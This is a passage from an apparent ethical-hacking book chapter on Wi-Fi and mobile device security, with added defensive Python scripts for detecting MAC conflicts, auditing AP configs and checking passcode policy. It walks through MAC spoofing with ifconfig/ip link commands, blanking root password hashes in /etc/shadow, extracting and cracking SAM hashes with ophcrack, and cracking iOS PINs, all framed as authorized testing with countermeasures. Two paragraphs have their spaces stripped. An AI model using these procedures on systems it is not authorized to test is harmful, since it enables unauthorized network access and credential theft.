Use personal firewall software, such as Windows Firewall, on all wireless hosts to prevent unauthorized remote access into your hosts, and subsequently, your network.

Finally, don't forget about user education. It's not foolproof, but it can help serve as an additional layer of defense. Ensure that security is always on the top of everyone's mind. Chapter 19 contains additional information about user awareness and training.
MAC spoofing

A common defense for wireless networks is Media Access Control (MAC) address controls. This is where you configure your APs to allow only wireless clients with known MAC addresses to connect to the network. Consequently, a very common hack against wireless networks is MAC address spoofing.

The bad guys can easily spoof MAC addresses in Linux by using the ifconfig (or ip link) command, and in Windows by using the SMAC utility, as I describe in Chapter 9. However, like WEP and WPA, MAC address-based access controls are another layer of protection and better than nothing at all. If someone spoofs one of your MAC addresses, the only way to detect malicious behavior is through contextual awareness: spotting the same MAC address being used in two or more places on the WLAN, or two interleaved frame streams with different 802.11 sequence counters under one address, which can be tricky.

One simple way to determine whether an AP is using MAC address controls is to try to associate with it and obtain an IP address via DHCP. If you can get an IP address, the AP doesn't have MAC address controls enabled.

The following steps outline how you can test your MAC address controls and demonstrate just how easy they are to circumvent:

1. Find an AP to attach to.

You can do this simply by loading NetStumbler, as shown in Figure 10-16.

In this test network, the AP with the SSID of doh! is the one I want to test. Note the MAC address of this AP as well. This will help you make sure you're looking at the right packets in the steps that follow. Although I've hidden most of the MAC address of this AP for the sake of privacy, let's just say its MAC address is 00:40:96:FF:FF:FF. Also, notice in Figure 10-16 that NetStumbler was able to determine the IP address of the AP. Getting an IP address will help you confirm that you're on the right wireless network.

2. Using a WLAN analyzer, look for a wireless client sending a probe request packet to the broadcast address or the AP replying with a probe response.

You can set up a filter in your analyzer to look for such frames, or you can simply capture packets and just browse through looking for the AP's MAC address, which you noted in Step 1. Figure 10-17 shows what the Probe Request and Probe Response packets look like.

Note that the wireless client (again for privacy, suppose its full MAC address is 00:09:5B:FF:FF:FF) first sends out a probe request to the broadcast address (FF:FF:FF:FF:FF:FF) in packet number 98. The AP with the MAC address I'm looking for replies with a Probe Response to 00:09:5B:FF:FF:FF, confirming that this is indeed a wireless client on the network for which I'll be testing MAC address controls.

3. Change your test computer's MAC address to that of the wireless client's MAC address you found in Step 2.

In UNIX and Linux, you can change your MAC address very easily by using the ifconfig command as follows:

a. Log in as root and then disable the network interface.

Insert the network interface name that you want to disable (typically wlan0 or ath0) into the command, like this:

[root@localhost root]# ifconfig wlan0 down

b. Enter the new MAC address you want to use.

Insert the MAC address you're borrowing and the network interface name like this:

[root@localhost root]# ifconfig wlan0 hw ether 00:09:5b:ff:ff:ff

The following command also works in Linux, and is the one to use on distributions that no longer ship ifconfig:

[root@localhost root]# ip link set wlan0 address 00:09:5b:ff:ff:ff

Whatever address you choose, make sure the low bit of the first octet is 0 (for example 00:... or 02:..., never 01:...): an odd first octet denotes a multicast address, and most drivers refuse to assign one to an interface.

c. Bring the interface back up with this command:

[root@localhost root]# ifconfig wlan0 up

If you change your Linux MAC addresses often, you can use a more feature-rich utility called GNU MAC Changer (https://github.com/alobbs/macchanger).

More recent versions of Windows make it difficult to change your MAC address. You might be able to change your MAC address in your wireless NIC properties via Control Panel. However, if you don't like tweaking the OS in this manner (or cannot), you can try a neat and inexpensive tool created by KLC Consulting called SMAC (available at www.klcconsulting.net/smac). To change your MAC address, you can use the steps I outline in Chapter 9.

When you're done, SMAC presents something similar to the screen shown in Figure 10-18.

To reverse any of the preceding MAC address changes, simply reverse the steps performed and then delete any data you created.

Note that APs, routers, switches, and the like might detect when more than one system is using the same MAC address on the network (that is, yours and the host that you're spoofing). You might have to wait until that system is no longer on the network; however, I rarely see any issues spoofing MAC addresses in this way, so you probably won't have to do anything.

4. Ensure that you are connected to the appropriate SSID.

Even if your network is running WEP or WPA, you can still test your MAC address controls. You just need to enter your encryption key(s) before you can connect.

5. Obtain an IP address on the network.

You can do this by rebooting or disabling/enabling your wireless NIC. However, you can do it manually by running ipconfig /renew at a Windows command prompt or by manually entering a known IP address in your wireless network card's network properties.

6. Confirm that you're on the network by pinging another host or browsing the Internet.

In this example, I could ping the AP (10.11.12.154) or simply load my favorite web browser to see whether I can access the Internet.

Figure 10-16: Finding an accessible AP via NetStumbler.

Figure 10-17: Looking for the MAC address of a wireless client on the network being tested.

Figure 10-18: SMAC showing a spoofed MAC address.

That's all there is to it! You've circumvented your wireless network's MAC address controls in six simple steps. Piece of cake!
CountermeasuresagainstMACspoofingTheeasiestwaytopreventthecircumventionofMACaddresscontrolsandsubsequentunauthorizedattachmenttoyourwirelessnetworkistoenableWPA2.AnotherwaytocontrolMACspoofingisbyusingaWIPS.Thissecondoptioniscertainlymorecostly,butitcouldbewellworththemoneywhenyouconsidertheotherproactivemonitoringandblockingbenefitssuchasystemwouldprovide.
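The text above notes that APs and switches may notice when two systems share one MAC address. The following is an added example, not code from the book, showing how a defender can spot that condition in DHCP server logs without a WIPS: it parses dhcpd-style DHCPACK lines and reports any MAC that was leased more than one IP address or presented more than one hostname. The log lines are constructed samples, and the hostname-in-parentheses field is assumed to be present as in ISC dhcpd output.

```python
import re
from collections import defaultdict

# Constructed dhcpd-style log lines for illustration (not a real capture).
# The third and fourth lines show one MAC turning up with two different
# IP leases and two different client hostnames within a few minutes.
SAMPLE_LOG = """\
2016-03-01T10:02:11 dhcpd: DHCPACK on 10.11.12.37 to 00:11:22:33:44:55 (sales-laptop) via wlan0
2016-03-01T10:02:40 dhcpd: DHCPACK on 10.11.12.38 to 00:11:22:33:44:66 (hr-tablet) via wlan0
2016-03-01T10:05:09 dhcpd: DHCPACK on 10.11.12.98 to 00:11:22:33:44:55 (unknown-host) via wlan0
2016-03-01T10:06:00 dhcpd: DHCPACK on 10.11.12.37 to 00:11:22:33:44:55 (sales-laptop) via wlan0
2016-03-01T10:07:13 dhcpd: DHCPACK on 10.11.12.40 to 01:23:45:67:89:ab (test-box) via wlan0
"""

# Matches "DHCPACK on <ip> to <mac> (<hostname>)"; the hostname part is optional.
ACK_RE = re.compile(
    r"DHCPACK on (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) to "
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})"
    r"(?: \((?P<host>[^)]*)\))?",
    re.IGNORECASE,
)


def parse_acks(log_text):
    """Yield (ip, mac, hostname) tuples from DHCPACK lines; other lines are skipped."""
    for line in log_text.splitlines():
        m = ACK_RE.search(line)
        if m:
            yield m.group("ip"), m.group("mac").lower(), m.group("host") or ""


def find_mac_conflicts(log_text):
    """Return {mac: {"ips": [...], "hosts": [...]}} for every MAC that received
    more than one IP lease or presented more than one client hostname."""
    ips = defaultdict(set)
    hosts = defaultdict(set)
    for ip, mac, host in parse_acks(log_text):
        ips[mac].add(ip)
        if host:
            hosts[mac].add(host)
    conflicts = {}
    for mac in ips:
        if len(ips[mac]) > 1 or len(hosts[mac]) > 1:
            conflicts[mac] = {"ips": sorted(ips[mac]), "hosts": sorted(hosts[mac])}
    return conflicts


if __name__ == "__main__":
    for mac, detail in find_mac_conflicts(SAMPLE_LOG).items():
        print(f"{mac}: leases {detail['ips']} hostnames {detail['hosts']}")
```

A hit from this check is a lead, not proof: a legitimate client that renewed onto a new address will also show two IPs, so correlate the MAC with the switch port or AP association table before acting. The hostname mismatch is the stronger signal, because a spoofing host rarely knows what name the real client sends.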
Physical security problems
Various physical security vulnerabilities can result in physical theft, the reconfiguration of wireless devices, and the capturing of confidential information. You should look for the following security vulnerabilities when testing your systems:
APs mounted on the outside of a building and accessible to the public.
Poorly mounted antennas—or the wrong types of antennas—that broadcast too strong a signal and that are accessible to the public. You can view the signal strength in NetStumbler, your wireless client manager, or one of the commercial tools I mention earlier in this chapter.
These issues are often overlooked because of rushed installations, improper planning, and lack of technical knowledge, but they can come back to haunt you. The book Wireless Networks For Dummies provides more details.
Countermeasures against physical security problems
Ensure that APs, antennas, and other wireless and network infrastructure equipment are locked away in secure closets, ceilings, or other places that are difficult for a would-be intruder to access physically. Terminate your APs outside any firewall or other network perimeter security devices—or at least in a DMZ—whenever possible. If you place unsecured wireless equipment inside your secure network, it can negate any benefits you would get from your perimeter security devices, such as your firewall.
If wireless signals are propagating outside your building where they don't belong, either
Turn down the transmit power setting of your AP.
Use a smaller or different antenna (semidirectional or directional) to decrease the signal.
Some basic planning helps prevent these vulnerabilities.
Vulnerable wireless workstations
Wireless workstations such as Windows-based laptops can have tons of security vulnerabilities—from weak passwords to unpatched security holes to the storage of WEP and WPA encryption keys locally. Most of the well-known wireless client vulnerabilities have been patched by their respective vendors, but you never know whether all your wireless systems are running the latest (and usually safest) versions of operating systems, wireless client software, and other software applications.
In addition to using the wireless client, stumbling, and network analysis software I mention earlier in this chapter, you should also search for wireless client vulnerabilities by performing authenticated scans using various vulnerability testing tools, such as GFI LanGuard, Nexpose, and Acunetix Web Vulnerability Scanner.
These programs aren't wireless-specific, but they might turn up vulnerabilities in your wireless computers that you might not have discovered or thought about testing otherwise. I cover operating system and application vulnerabilities as well as using the tools in the preceding list in Parts IV and V of this book.
Countermeasures against vulnerable wireless workstations
You can implement the following countermeasures to keep your workstations from being used as entry points into your wireless network:
Regularly perform vulnerability assessments on your wireless workstations, in addition to other network hosts.
Apply the latest vendor security patches and enforce strong user passwords.
Use personal firewalls and endpoint security software on all wireless systems where possible, including phones and tablets, to keep malicious intruders off those systems and out of your network.
Install anti-malware software.
Default configuration settings
Similar to wireless workstations, wireless APs have many known vulnerabilities. The most common ones are default SSIDs and admin passwords. The more specific ones occur only on certain hardware and software versions that are posted in vulnerability databases and vendor websites. Many wireless systems still have WEP and WPA disabled by default as well.
Countermeasures against default configuration settings exploits
You can implement some of the simplest and most effective security countermeasures for Wi-Fi—and they're all free:
Make sure that you change default admin passwords and SSIDs.
At a minimum, enable WPA2. Use very strong pre-shared keys (PSKs) consisting of at least 20 random characters or use WPA/WPA2 in enterprise mode with a RADIUS server for host authentication.
Disable SSID broadcasting if you don't need this feature.
Apply the latest firmware patches for your APs and Wi-Fi cards. This countermeasure helps to prevent various vulnerabilities to minimize the exploitation of publicly known holes related to management interfaces on APs and client-management software on the clients.
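The countermeasures above (change the default SSID, enable WPA2, use a 20-plus character random PSK or enterprise mode with RADIUS, disable SSID broadcast if not needed) can be checked mechanically against an AP's configuration. The following added example, which is not from the book, audits a hostapd-style key=value configuration for those points and shows a weak configuration beside a corrected one. The hostapd option names (ssid, wpa, wpa_passphrase, wpa_key_mgmt, rsn_pairwise, ignore_broadcast_ssid, auth_server_addr) are real; the default-SSID list and the passphrase "randomness" heuristic are assumptions chosen for illustration. The TKIP check is an addition beyond the text: CCMP is the cipher WPA2 is meant to use.

```python
import string

# Illustrative (not exhaustive) list of SSIDs shipped as defaults by consumer APs.
DEFAULT_SSIDS = {"default", "linksys", "netgear", "dlink", "wireless"}

# Constructed weak configuration: default SSID, WPA1, TKIP, short dictionary PSK.
WEAK_CONF = """\
interface=wlan0
ssid=linksys
wpa=1
wpa_passphrase=password1
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
"""

# Constructed hardened configuration following the chapter's countermeasures.
HARDENED_CONF = """\
interface=wlan0
ssid=corp-wlan-7f3a
ignore_broadcast_ssid=1
wpa=2
wpa_passphrase=Qv7#mR2!kp9Lz@4Xs&8Wd
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
"""


def parse_conf(text):
    """Parse key=value lines; blank lines and # comments are ignored."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        conf[key.strip()] = value.strip()
    return conf


def passphrase_is_strong(psk, min_len=20):
    """Assumed heuristic for 'at least 20 random characters': minimum length
    plus at least three of the four character classes."""
    classes = [
        any(c.islower() for c in psk),
        any(c.isupper() for c in psk),
        any(c.isdigit() for c in psk),
        any(c in string.punctuation for c in psk),
    ]
    return len(psk) >= min_len and sum(classes) >= 3


def audit_ap_config(text):
    """Return a list of findings; an empty list means nothing to fix."""
    conf = parse_conf(text)
    findings = []
    if conf.get("ssid", "").lower() in DEFAULT_SSIDS:
        findings.append("default SSID in use: change it")
    if any(k.startswith("wep_") for k in conf):
        findings.append("WEP keys configured: remove them")
    wpa = conf.get("wpa")
    if wpa is None:
        findings.append("no WPA configured: network is open")
    elif wpa != "2":
        findings.append(f"wpa={wpa} permits WPA1 clients: set wpa=2")
    pairwise = conf.get("rsn_pairwise", conf.get("wpa_pairwise", ""))
    if "TKIP" in pairwise.upper():
        findings.append("TKIP cipher enabled: use CCMP only")
    mgmt = conf.get("wpa_key_mgmt", "WPA-PSK")
    if "WPA-PSK" in mgmt and not passphrase_is_strong(conf.get("wpa_passphrase", "")):
        findings.append("pre-shared key is shorter than 20 characters or low-entropy")
    if "WPA-EAP" in mgmt and "auth_server_addr" not in conf:
        findings.append("enterprise mode selected but no RADIUS server configured")
    if conf.get("ignore_broadcast_ssid", "0") == "0":
        findings.append("SSID broadcast enabled: disable it if not needed")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_ap_config(conf) or ["no findings"])
```

The admin-password and firmware items from the list cannot be judged from this file; they belong in the device's management interface and patch process.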
Mobile Devices
In This Chapter
Seeking out the common weaknesses in laptops, phones, and tablets
Executing security tests to uncover crucial mobile flaws
Exploring the security vulnerabilities associated with the Internet of Things (IoT)
Minimizing mobile security risks
Mobile computing is the new target for business—and for hacking. It seems that everyone has a mobile device of some sort for either personal or business use; often both. If not properly secured, mobile devices connected to the enterprise network represent thousands upon thousands of unprotected islands of information floating about, out of your control.
Because of all the phones, tablets, and laptops running numerous operating system platforms chock-full of apps, an infinite number of risks are associated with mobile computing. Rather than delving into all the variables, this chapter explores some of the biggest, most common mobile security flaws that could impact you and your business.
Sizing Up Mobile Vulnerabilities
It pays to find and fix the low-hanging fruit on your network. That's where you get the most bang for your buck. The following mobile laptop, phone, and tablet weaknesses should be front and center on your priority list:
No encryption
Poorly implemented encryption
No power-on passwords
Easily guessed (or cracked) power-on passwords
For other technologies and systems (web applications, operating systems, and so on), you can usually find just the testing tool you need. However, for finding mobile-related flaws, relatively few security testing tools are available. Not surprisingly, the more expensive tools often enable you to uncover the big flaws with the least amount of pain and hassle.
Cracking Laptop Passwords
Arguably the greatest threat to any business's security is unencrypted laptops. Given all the headlines and awareness about this effectively inexcusable security vulnerability, I can't believe it's still so prevalent in business. This section explores tools you can use to crack unencrypted laptop passwords on Windows, Linux, or Mac OS X systems. You then find out about the basic countermeasures to prevent this vulnerability.
Choosing your tools
My favorite tool to demonstrate the risks associated with unencrypted laptops running Windows is ElcomSoft System Recovery (www.elcomsoft.com/esr.html). You simply burn this tool to a CD and use it to boot the system you want to recover (or reset) the password from, as shown in Figure 11-1.
Figure 11-1: ElcomSoft System Recovery is great for cracking and resetting Windows passwords on unprotected laptops.
You have the option to reset the local administrator (or other) password or have it crack all passwords. It's really that simple, and it's highly successful, even on the latest operating systems, such as Windows 8.1 or Windows 10. The most difficult and time-consuming thing about ElcomSoft System Recovery is downloading and burning it to CD.
You can also use an older tool for Windows called NTAccess (www.mirider.com/ntaccess.html) for resetting local Windows accounts. This program isn't pretty or fancy, but it does the job. There are others available as well. As with ophcrack (discussed a little later in this section), ElcomSoft and NTAccess provide an excellent way to demonstrate that you need to encrypt your laptop hard drives.
People will tell you they don't have anything important or sensitive on their laptops. They do. Even seemingly benign laptops used for training or sales can have tons of sensitive information that can be used against your business. This includes spreadsheets that users have copied from the network to work on locally, VPN connections with stored login credentials, web browsers that have cached browsing history, and even worse, website passwords that users have chosen to save.
After you reset or crack the local administrator (or other) account, you can log in to Windows and have full access to the system. By simply poking around using WinHex (www.winhex.com/winhex) or similar or AccessEnum (https://technet.microsoft.com/en-us/library/bb897332.aspx), you can find sensitive information, remote network connections, and cached web connections to demonstrate the business risk. If you want to dig even deeper, you can use additional tools from ElcomSoft (www.elcomsoft.com/products.html), such as ElcomSoft Internet Password Breaker, Proactive System Password Recovery, and Advanced EFS Data Recovery for uncovering additional information from Windows systems. Passware (www.lostpassword.com) offers many similar commercial tools as well.
If you want to perform similar checks on a Linux-based laptop, you should be able to boot from a Knoppix (www.knoppix.net) or similar "live" Linux distribution and edit the local passwd file (often /etc/shadow) to reset or change it. Remove the encrypted code between the first and second colons for the "root" (or whatever user) entry or copy the password from the entry of another user and paste it into that area. Passware Kit Forensic can be used to decrypt Mac OS X systems encrypted with FileVault 2.
If you're budget-strapped and need a free option for cracking Windows passwords, you can use ophcrack as a standalone program in Windows by following these steps:
1. Download the source file from http://ophcrack.sourceforge.net.
2. Extract and install the program by entering the following command:
ophcrack-vista-livecd-3.6.0.exe (or whatever the current filename is)
3. Load the program by starting the ophcrack icon from your Start menu.
4. Click the Load button and select the type of test you want to run.
In this example, shown in Figure 11-2, I'm connecting to a remote server called server1. This way, ophcrack will authenticate to the remote server using my locally logged-in username and run pwdump code to extract the password hashes from the server's SAM database. You can also load hashes from the local machine or from hashes extracted during a previous pwdump session.
The extracted password hash usernames will look similar to those shown in Figure 11-3.
5. Click the Launch icon to begin the rainbow crack process.
If you see that password hashes are only in the NT Hash column as shown in Figure 11-3, you'll need to make sure you have downloaded the proper hash tables from http://ophcrack.sourceforge.net/tables.php or elsewhere. A good one to start with would be Vista special (8.0GB). In order to load new tables, you click the Tables icon at the top of the ophcrack window as shown in Figure 11-4.
Figure 11-2: Loading password hashes from a remote SAM database in ophcrack.
Figure 11-3: Usernames and hashes extracted via ophcrack.
Figure 11-4: Loading the required hash tables in ophcrack.
If necessary, relaunch the rainbow crack process in Step 5. The process can take just a few seconds to several days (or more) depending on your computer's speed and the complexity of the hashes being cracked.
There's also a bootable Linux-based version of ophcrack (available at http://ophcrack.sourceforge.net/download.php?type=livecd) that allows you to boot a system and start cracking passwords without having to log in or install any software.
I highly recommend you use ophcrack's LiveCD on a sample laptop computer or two to demonstrate just how simple it is to recover passwords and, subsequently, sensitive information from laptops that don't have encrypted hard drives. It's amazingly simple, yet people still refuse to invest money in full disk encryption software. ElcomSoft System Recovery is another great tool for this exercise.
Countermeasures
The best safeguard against a hacker using a password reset program against your systems is to encrypt your hard drives. You can use BitLocker in Windows, WinMagic SecureDoc (www.winmagic.com/products), or other preferred product for the platform your systems are running on.
Power-on passwords set in the BIOS can be helpful as well, but they're often a mere bump in the road. All a criminal has to do is reset the BIOS password or, better yet, simply remove the hard drive from your lost system and access it from another machine. You also need to ensure that people can't gain unauthorized physical access to your computers. When a hacker has physical access and your drives are not encrypted, all bets are off. That said, full disk encryption is not foolproof—see the nearby sidebar, "The fallacy of full disk encryption."
The fallacy of full disk encryption
It seems simple enough to just encrypt your laptop hard drives and be done with laptop security. In a perfect world, that would be the case, but as long as people are involved, I suspect this mobile weakness will continue to exist.
Several problems with disk encryption create a false sense of security:
Password selection: Your disk encryption is only as good as the password (or passphrase) that was used to enable the encryption.
Key management: If your users don't have a way to get into their systems if they forget or lose their passwords, they'll get burned once and do whatever it takes not to encrypt their drives moving forward. Also, certain disk encryption software such as Microsoft's BitLocker may provide the option for (or even require) users to carry around their decryption key on a thumb drive or similar storage device. Imagine losing a laptop with the key to the kingdom stored right inside the laptop bag! It happens.
Screen locking: This third potentially fatal flaw with full disk encryption occurs when users refuse to ensure their screens are locked whenever they step away from their encrypted laptops. All it takes is a few seconds for a criminal to swipe a laptop to gain—and maintain—full access to a laptop that's "fully protected" with full disk encryption.
One final note, and this is important: certain types of full disk encryption can be cracked altogether. For example, the protections offered by BitLocker, FileVault 2 (Mac OS X), and TrueCrypt can be fully negated by a program from Passware called Passware Kit Forensic (www.lostpassword.com/kit-forensic.htm). I cover this flaw and other enterprise security concerns involving BitLocker in my whitepapers available at www.principlelogic.com/bitlocker.html. Furthermore, you shouldn't be using TrueCrypt given that its original developers went dark and flaws exist that can allow for full system compromise. Another option for cracking encrypted disks is ElcomSoft Forensic Disk Decryptor (www.elcomsoft.com/efdd.html). Even with these vulnerabilities, full disk encryption can still protect your systems from the less technically-inclined passers-by who might end up in possession of one of your lost or stolen systems.
Cracking Phones and Tablets
I don't envy IT administrators and information security managers for many reasons but especially when it comes to the bring your own device (BYOD) movement taking place in business today. With BYOD, you have to trust that your users are making good decisions about security, and you have to figure out how to manage each and every device, platform, and app. This management task is arguably the greatest challenge IT professionals have faced to this point. Further complicating matters, you have criminal hackers, thieves, and other hooligans doing their best to exploit the complexity of it all, and it's creating some serious business risks. The reality is that very few businesses—and individuals—have their phones and tablets properly secured.
Plenty of vendors claim that their mobile device management (MDM) solutions are the answer to phone and tablet woes. They're right… to an extent. MDM controls that separate personal information from business information and ensure the proper security controls are enabled at all times can help you make a big leap toward locking down the mobile enterprise.
One of the greatest things you can do to protect phones and tablets from unauthorized use is to implement this nifty security control that dates back to the beginning of computers: passwords. Yep, your phone and tablet users should employ good old-fashioned passwords (technically passphrases) that are easy to remember yet hard to guess. Passwords are one of the best controls you can have. Yet there are plenty of mobile devices with no passwords or passwords that are easily cracked.
Starting with iOS 9, devices come with a 6-character passcode default. Android Lollipop originally defaulted to encrypting the entire device although that was reversed after complaints of performance degradation.
In the following section, I demonstrate accessing mobile devices by using a commercial forensics tool. Keep in mind that such tools are typically restricted to law enforcement personnel and security professionals, but they could certainly end up in the hands of the bad guys. Using such tools for your own information security testing can be a great way to demonstrate the business risk and make the case for better mobile controls.
Mobile apps can introduce a slew of security vulnerabilities into your environment, especially certain apps available for Android via Google Play that aren't properly vetted. In recent source code analysis using Checkmarx's CxSuite (see Chapter 15), I've found these apps to have the same flaws as traditional software, such as SQL injection, hard-coded encryption keys, and buffer overflows that can put sensitive information at risk. The threat of malware is there as well. Mobile apps are yet another reason to get your mobile environment under control using, at a minimum, a proven MDM system such as MaaS360 (www.maas360.com) or AirWatch (www.air-watch.com).
Cracking iOS passwords
I'd venture to guess that many phone and tablet passwords (really, they're just 4-digit PINs, or passcodes) can be guessed outright. A mobile device gets lost or stolen and all the person recovering it has to do is try some basic number combinations such as 1234, 1212, or 0000. Soon, voilà!—the system is unlocked.
Many phones and tablets running iOS and Android are configured to wipe the device if the incorrect password is entered X number of times (often 10 failed attempts). A reasonable security control indeed. But what else can be done? Some commercial tools can be used to crack simple passwords/PINs and recover information from lost or stolen devices or devices undergoing a forensics investigation.
ElcomSoft's iOS Forensic Toolkit (http://ios.elcomsoft.com) provides a means for demonstrating just how easily passwords/PINs on iOS-based phones and tablets can be cracked up through iOS version 7. Here's how:
1. Plug your iPhone/iPod/iPad into your test computer and place it into Device Firmware Upgrade (DFU) mode.
To enter DFU mode, simply power the device off, hold down the Home button (bottom center) and sleep button (often the upper right corner) at the same time for 10 seconds, and continue holding down the Home button for another 10 seconds. The mobile device screen goes blank.
2. Load the iOS Forensic Toolkit by inserting your USB license dongle into your test computer and running Toolkit.cmd.
You see the screen shown in Figure 11-5.
3. Load the iOS Forensic Toolkit Ramdisk onto the mobile device by selecting option 2 LOAD RAMDISK.
Loading the RAMDISK code allows your test computer to communicate with the mobile device and run the tools needed for cracking the password (among other things).
4. Select the iOS device that's connected, as shown in Figure 11-6.
I selected option 14 because I have an iPhone 4 with GSM.
You now see the toolkit connect to the device and confirm a successful load, as shown in Figure 11-7. You should see the ElcomSoft logo in the middle of your mobile device's screen as well.
5. To crack the device's password/PIN, simply select option 6 GET PASSCODE on the main menu.
iOS Forensic Toolkit will prompt you to save the passcode to a file. You can press Enter to accept the default of passcode.txt. The cracking process will commence and, with any luck, the passcode will be found and displayed as shown in Figure 11-8.
So, having no password for phones and tablets is bad, and a 4-digit PIN such as this is not much better. User beware!
You can also use iOS Forensic Toolkit to copy files and even crack the keychains to uncover the password that protects the device's backups in iTunes (option 5 GET KEYS).
Using ElcomSoft's iOS Forensic Toolkit to crack iOS versions 8 and up won't be quite as fruitful for now as Apple has finally started to really lock down the operating system. Apple iOS is still not without its flaws. As recently as iOS 9, there was an exploit that allowed attackers to bypass the login screen altogether.
If anything, you need to be thinking about how your business information, which is most certainly present on phones and tablets, is going to be handled in the event one of your employee's devices is seized by law enforcement personnel. Sure, they'll follow their chain-of-custody procedures, but overall, they'll have very little incentive to ensure the information stays protected in the long term.
Figure 11-5: iOS Forensic Toolkit's main page.
Figure 11-6: Select the appropriate iOS device from the list.
Figure 11-7: iOS Forensic Toolkit Ramdisk loading successfully.
Figure 11-8: Cracking a 4-digit PIN on an iPhone.
Be careful with how you sync your mobile devices and, especially, where the file backups are stored. They may be off in the wild blue yonder (the cloud), which means you have no real way to gauge how secure the personal and business information truly is. On the other hand, when synched files and backups are stored without a password, with a weak password, or on an unencrypted laptop, everything is still at risk given the tools available to crack the encryption used to protect this information. For instance, ElcomSoft's Phone Breaker (www.elcomsoft.com/eppb.html) can be used to unlock backups from BlackBerry and Apple devices as well as recover online backups made to iCloud and Windows Live!.
Oxygen Forensic Suite (www.oxygen-forensic.com) is an alternative commercial tool that can be used for cracking iOS-based passwords as well as additional recovery functionality for Android-based systems. Figure 11-9 shows the Oxygen Forensic Suite interface and types of information that can be extracted from an Android-based device. The Oxygen Forensic Suite Extractor tool can connect and extract this information relatively quickly—something that can, of course, be used against your organization when mobile devices are lost or stolen.
Figure 11-9: Oxygen Forensic Suite.
Oxygen Forensic Suite is also great for performing security assessments of mobile apps, which I cover in Chapter 15.
Countermeasures against password cracking
The most realistic way to prevent such password cracking is to require—and continually enforce—strong passwords such as multi-digit PINs consisting of 5 or more numbers or, better yet, complex passphrases that are very easy to remember yet practically impossible to crack such as Progressive_r0ck_rules!. MDM controls can help you enforce such a policy. You'll likely get pushback from employees and management, but it's the only sure bet to help prevent this attack. I cover getting buy-in for your security initiatives in Chapter 20. Good luck!
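The passcode policy just described (PINs of 5 or more digits, or a complex passphrase such as the Progressive_r0ck_rules! example) is the kind of rule an MDM enforces at enrollment. The following added example, which is not from the book, implements such a policy check in Python so that the weak PINs named earlier in the section (1234, 1212, 0000) are rejected and the chapter's passphrase example passes. The common-PIN list beyond those three, the 12-character passphrase minimum, and the three-character-class requirement are assumptions made for the example; the 10-attempt lockout figure is the one the section quotes.

```python
import re

# PINs people commonly choose. 1234, 1212 and 0000 come from the chapter;
# the rest are constructed examples of the same habit (repeats, keypad lines).
COMMON_PINS = {"1234", "1212", "0000", "1111", "123456", "000000", "2580"}

MIN_PIN_DIGITS = 5             # "multi-digit PINs consisting of 5 or more numbers"
MIN_PASSPHRASE_LEN = 12        # assumed minimum for a complex passphrase
MAX_ATTEMPTS_BEFORE_WIPE = 10  # "often 10 failed attempts"


def _is_run(digits):
    """True for constant-step sequences such as 1234, 4321 or 1357."""
    if len(digits) < 3:
        return False
    steps = {int(b) - int(a) for a, b in zip(digits, digits[1:])}
    return len(steps) == 1


def check_passcode(code):
    """Return a list of policy violations; an empty list means the passcode is acceptable."""
    problems = []
    if code.isdigit():
        if code in COMMON_PINS:
            problems.append("common PIN")
        if len(code) < MIN_PIN_DIGITS:
            problems.append(f"PIN shorter than {MIN_PIN_DIGITS} digits")
        if len(set(code)) == 1:
            problems.append("single repeated digit")
        elif _is_run(code):
            problems.append("sequential digits")
    else:
        if len(code) < MIN_PASSPHRASE_LEN:
            problems.append(f"passphrase shorter than {MIN_PASSPHRASE_LEN} characters")
        classes = sum([
            bool(re.search(r"[a-z]", code)),
            bool(re.search(r"[A-Z]", code)),
            bool(re.search(r"\d", code)),
            bool(re.search(r"[^A-Za-z0-9]", code)),
        ])
        if classes < 3:
            problems.append("passphrase uses fewer than 3 character classes")
    return problems


def guess_probability(pin_length, attempts=MAX_ATTEMPTS_BEFORE_WIPE):
    """Chance that a uniformly random numeric PIN of this length is hit
    within the wipe-on-failure budget. This bounds the random case only;
    the common-PIN list is what catches the human case."""
    return attempts / 10 ** pin_length


if __name__ == "__main__":
    for candidate in ("1234", "0000", "83719", "Progressive_r0ck_rules!"):
        print(candidate, check_passcode(candidate) or ["ok"])
    print("random 4-digit PIN guessed within lockout:", guess_probability(4))
```

The numeric lockout does most of the work against random PINs, which is why the check concentrates on the human factor: short, repeated, sequential and popular values that are tried first regardless of the keyspace.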
Hacking the Internet of Things
No chapter on mobile devices would be complete without some coverage of the Internet of Things (IoT). Computer systems that fall into this "IoT" include everything from home alarm systems to manufacturing equipment to coffee pots and pretty much anything in between. Even automobiles can now be hacked as you've likely heard about in the highly publicized hack against a Jeep Cherokee in 2015.
Cisco Systems has estimated that the IoT will grow to 50 billion devices by 2020! Perhaps this is why all IPv4 addresses are now gone. I'm not sure that that's a good thing for most people, but it certainly sounds like job security for those of us working in this industry. If you're going to lock down IoT systems, you must first understand how they're vulnerable. Given that IoT systems are not unlike other network systems (i.e., they have an IP address and/or a web interface), you'll be able to use standard vulnerability scanners to uncover flaws. Additional security checks you should run on IoT systems include:
What information is stored on the system (i.e., sensitive customer information, intellectual property, or biodata from devices such as Fitbits and Apple Watches)? If systems are lost or stolen, is that going to create business risks?
How is information communicated to and from each system? Is it encrypted?
Are passwords required? What are the default password complexity standards? Can they be changed? Does intruder lockout exist to help prevent password cracking?
What patches are missing that facilitate security exploits? Are software updates even available?
How do the systems stand up under vulnerability scans and, even more so, simulated denial of service attacks?
What additional security policies need to be put in place to address IoT systems?
Just like any other system in your network environment, IoT systems, devices, and widgets (or whatever you call them) need to be included in the scope of your security testing. If they're not, vulnerabilities could be lurking that if eventually exploited can lead to a breach or potentially even more catastrophic situation.
Hacking Operating Systems
Inthispart…Nowthatyou’repastthenetworklevel,it’stimetogetdowntothenitty-gritty—thosefunoperatingsystemsyouuseonadailybasisandhavecometobothlove(andhate).Idefinitelydon’thaveenoughroominthisbooktocovereveryoperatingsystemversionoreveneveryoperatingsystemvulnerability,butIcertainlyhittheimportantparts—especiallytheonesthataren’teasilyfixedwithpatches.
